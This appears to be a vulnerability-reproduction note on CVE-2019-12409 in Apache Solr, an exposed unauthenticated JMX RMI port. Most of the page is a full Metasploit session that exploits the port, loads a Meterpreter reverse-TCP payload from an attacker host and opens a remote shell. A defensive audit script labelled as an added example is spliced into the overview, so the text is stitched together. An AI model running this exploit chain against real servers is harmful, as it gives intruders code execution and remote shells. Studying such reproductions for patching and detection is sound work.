    005-CVE-2019-12409 Apache Solr 远程命令执行漏洞.md
    4.12 KB / 2021-07-17 00:01:26
        ## CVE-2019-12409 Apache Solr Remote Command Execution Vulnerability
    
    ### 1. Vulnerability Overview
    
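    Apache Solr versions 8.1.1 and 8.2.0 running on Linux ship with an insecure default setting in solr.sh (ENABLE_REMOTE_JMX_OPTS="true"). This setting enables the JMX monitoring service and opens an RMI port, 18983, that listens on the public network and requires no authentication.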
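
A defensive check for the condition described above, as an added example that is not part of the original page: it reads the effective `ENABLE_REMOTE_JMX_OPTS` value from a Solr startup include file and looks for port 18983 bound beyond loopback in `ss -ltn` output. The function names and the option of passing the socket table as an argument are assumptions of this example.

```shell
#!/bin/sh
# Added example, not from the original page. POSIX sh; needs sed, awk, ss.
# Usage after sourcing: audit_solr_jmx /path/to/include-file [port]

# Print the effective value of KEY ($2) in shell include FILE ($1):
# the last uncommented assignment wins, surrounding quotes are stripped.
effective_value() {
  sed -n -E "s/^[[:space:]]*(export[[:space:]]+)?$2=[\"']?([^\"'#[:space:]]*).*/\2/p" "$1" | tail -n 1
}

# Succeed when FILE ($1) switches remote JMX on.
config_enables_remote_jmx() {
  [ "$(effective_value "$1" ENABLE_REMOTE_JMX_OPTS)" = "true" ]
}

# Read `ss -ltn` lines on stdin; print listeners on PORT ($1) that are bound
# to a non-loopback address. Succeed when at least one is found.
exposed_listeners() {
  awk -v port="$1" '
    $1 == "LISTEN" && $4 ~ (":" port "$") {
      addr = $4; sub(/:[0-9]+$/, "", addr)            # drop ":port"
      if (addr ~ /^127\./ || addr == "[::1]" || addr == "::1") next
      print $4; found = 1
    }
    END { exit !found }'
}

# Audit one host: FILE ($1), PORT ($2, default 18983 as on the page),
# socket table ($3, default: live `ss -ltn`). Returns 1 on any finding.
audit_solr_jmx() {
  asj_port=${2:-18983}
  asj_socks=${3:-$(ss -ltn 2>/dev/null || true)}
  asj_rc=0
  if config_enables_remote_jmx "$1"; then
    echo "FINDING: $1 sets ENABLE_REMOTE_JMX_OPTS=true; set it to \"false\" and restart Solr"
    asj_rc=1
  fi
  if asj_hit=$(printf '%s\n' "$asj_socks" | exposed_listeners "$asj_port"); then
    echo "FINDING: port $asj_port listens beyond loopback: $(printf '%s' "$asj_hit" | tr '\n' ' ')"
    asj_rc=1
  fi
  [ "$asj_rc" -ne 0 ] || echo "OK: no remote JMX exposure found"
  return "$asj_rc"
}
```

A commented-out assignment is ignored and a later assignment overrides an earlier one, so the check reflects what the startup script will actually see.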
    
    ### 2. Affected Versions
    
    Apache Solr versions 8.1.1 and 8.2.0
    
    ### 3. Reproduction Steps
    
    ```bash
    msf5 > use multi/misc/java_jmx_server
    msf5 exploit(multi/misc/java_jmx_server) > show options
    
    Module options (exploit/multi/misc/java_jmx_server):
    
       Name          Current Setting  Required  Description
       ----          ---------------  --------  -----------
       JMXRMI        jmxrmi           yes       The name where the JMX RMI interface is bound
       JMX_PASSWORD                   no        The password to interact with an authenticated JMX endpoint
       JMX_ROLE                       no        The role to interact with an authenticated JMX endpoint
       RHOSTS                         yes       The target address range or CIDR identifier
       RPORT                          yes       The target port (TCP)
       SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
       SRVPORT       8080             yes       The local port to listen on.
       SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
       URIPATH                        no        The URI to use for this exploit (default is random)
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Generic (Java Payload)
    
    
    msf5 exploit(multi/misc/java_jmx_server) > set RHOSTS a.a.a.a
    RHOSTS => a.a.a.a
    msf5 exploit(multi/misc/java_jmx_server) > set RPORT 18983
    RPORT => 18983
    msf5 exploit(multi/misc/java_jmx_server) > set payload java/meterpreter/reverse_tcp
    payload => java/meterpreter/reverse_tcp
    msf5 exploit(multi/misc/java_jmx_server) > show options
    
    Module options (exploit/multi/misc/java_jmx_server):
    
       Name          Current Setting  Required  Description
       ----          ---------------  --------  -----------
       JMXRMI        jmxrmi           yes       The name where the JMX RMI interface is bound
       JMX_PASSWORD                   no        The password to interact with an authenticated JMX endpoint
       JMX_ROLE                       no        The role to interact with an authenticated JMX endpoint
       RHOSTS        a.a.a.a     yes       The target address range or CIDR identifier
       RPORT         18983            yes       The target port (TCP)
       SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
       SRVPORT       8080             yes       The local port to listen on.
       SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
       URIPATH                        no        The URI to use for this exploit (default is random)
    
    
    Payload options (java/meterpreter/reverse_tcp):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST                   yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Generic (Java Payload)
    
    
    msf5 exploit(multi/misc/java_jmx_server) > set LHOST b.b.b.b
    LHOST => b.b.b.b
    msf5 exploit(multi/misc/java_jmx_server) > run
    [*] Started reverse TCP handler on b.b.b.b:4444
    [*] a.a.a.a:18983 - Using URL: http://b.b.b.b:8080/OcbYS8uaTPDH
    [*] a.a.a.a:18983 - Sending RMI Header...
    [*] a.a.a.a:18983 - Discovering the JMXRMI endpoint...
    [+] a.a.a.a:18983 - JMXRMI endpoint on a.a.a.a:18983
    [*] a.a.a.a:18983 - Proceeding with handshake...
    [+] a.a.a.a:18983 - Handshake with JMX MBean server on a.a.a.a:18983
    [*] a.a.a.a:18983 - Loading payload...
    [*] a.a.a.a:18983 - Replied to request for mlet
    [*] a.a.a.a:18983 - Replied to request for payload JAR
    [*] a.a.a.a:18983 - Executing payload...
    [*] a.a.a.a:18983 - Replied to request for payload JAR
    [*] Sending stage (53867 bytes) to a.a.a.a
    [*] Meterpreter session 1 opened (a.a.a.a:4444 -> b.b.b.b:46582) at 2019-11-21 15:24:53 +0000
    
    meterpreter >
    ```
    